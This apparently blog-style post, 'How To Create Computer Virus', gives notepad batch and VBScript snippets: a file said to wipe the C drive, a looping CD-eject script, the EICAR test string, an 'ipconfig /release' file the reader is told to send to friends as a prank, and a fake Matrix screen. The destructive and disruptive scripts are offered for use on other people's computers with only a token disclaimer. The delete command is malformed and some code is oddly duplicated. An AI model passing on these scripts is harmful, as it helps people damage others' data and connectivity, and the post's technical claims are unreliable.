
How To Create Computer Virus
Many of you will think the methods must be on coding, but there is nothing like that. The tricks are based on the notepad. Just follow the below steps for creating a virus within a minute.
1. Creating a Dangerous Virus
Step 1. First of all, in your Windows OS, open the notepad.
Step 2. Now copy and paste the below code in your notepad screen.
@Echo off
Del C: *.* |y
Step 3. Now save this file as virus.bat (you can select any of random name but .bat after that must be there).
Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.
Note: This method is only for knowledge purpose. Don’t try this on your computer as it will completely format your C drive.
2. Creating a Harmless Cdrom Virus
Open Notepad and Paste the following code into it and save it as CD-ROM.vbs or anything *.vbs
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
If you open this file your dc/dvd drive willl continously eject
To stop this virus, you need to open Task Manager and select process tab and end the wscript.exe file.
3. Create a Virus To Test Your Antivirus
Open notepad and paste the given code and simply save the file as “EICAR.COM”
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
If you have an active antivirus, then your antivirus program will simply remove this file in no-time. This is the harmless virus that is used to check the security level of your antivirus.
4. Virus To Stop Someone’s Internet Access
This is a harmless virus and it will not destroy your PC. You can use this trick to prank your friends. This virus stops anyone’s internet access. You need to type
the following code in the notepad.
the following code in the notepad.
@Echo off
Ipconfig /release
Now Save the file as a .bat format like internet.bat and sent it to your friends. The IP address will be lost, and therefore they won’t be able to fix it.
Well, if you want to fix it. Simply type in IPconfig /renew
5. Creating a Matrix Type screen
Well, it’s not a virus. It is just a simple notepad trick that will let you see the string of green characters appearing randomly. It has nothing to do with your computer registry, batch, etc. You can use this trick to scare your friend because the screen looks like a virus affected.
Simply open Notepad and type the following code into it.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Now save the file as Matrix.bat, and click on it and the show begins.
No comments:
Post a Comment